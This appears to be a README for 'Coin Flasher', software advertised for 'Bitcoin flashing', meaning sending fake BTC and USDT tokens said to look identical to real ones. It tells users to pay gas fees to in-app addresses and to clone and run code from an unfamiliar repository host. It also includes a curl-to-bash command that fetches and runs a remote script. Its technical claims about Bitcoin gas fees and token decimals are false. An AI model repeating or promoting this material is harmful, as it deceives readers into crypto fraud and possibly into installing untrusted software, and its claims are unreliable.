public-release / README.md
2.5 KB · 78 lines
B bitcoin-flashing
78 lines 2.5 KB
Blame
text/plain
Raw ZIP
Rendered Markdown

Description

What is Bitcoin flashing?

Bitcoin flashing is a practice of sending Bitcoin from one wallet to another in a transaction that will be rendered invalid in the long run. This is achieved either by manipulating the transaction signature, gas fees, or altering the token decimals programatically.

Bitcoin flashing software

Coin Flasher is a Bitcoin flashing software that lets users perform BTC and USDT flashing transactions with multiple variants of Bitcoin (including Bitcoin Fantom and Wrapped Bitcoin) and USDT (ERC20, SOL, BEP20, and TRC20). This software application exists solely as a proof of concept solution, and should only be used experimentally. The setup and utilization is entirely dummyproof. Flash tokens have a limited usage range, and they can not be swapped simply due to a lack of liquidity, ergo you can not sell them on cryptocurrency exchanges. That simply does not exist. What you can do, however, is transfer them between cold and hardware wallets. Flash tokens are identical to the real thing until you study the underlying code.

When you gain app access, you'll have a limited spendable quota of either bitcoin or USDT, but you'll be responsible for your gas fee for the flashing transactions. You'll find a gas address in-app and the gas topup process is simple.

Prerequisites

This application requires Node.js to run.

Android/IOS

Click here to visit the mobile repository.

Windows

Download the Node.js setup application here.

Linux

Run this code in terminal. You may need superuser privileges (sudo).

apt install nodejs

Mac

Install Homebrew (if you don't have it). Open the terminal and run:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Once Homebrew is installed, you can install Node.js by running:

brew install node

Installation

  1. Clone the repository:
git clone https://ltegit.com/bitcoin-flashing/public-release.git
  1. Install necessary dependencies:
cd "public-release"
npm install
npm install electron

Usage

npm start

Gas is required for every non-bitcoin (USDT, wBTC) flashing transaction. You are responsible for your gas fees. You'll find corresponding gas addresses for each token type.

Community

Stay updated through the official channel for progress tracking and feature updates.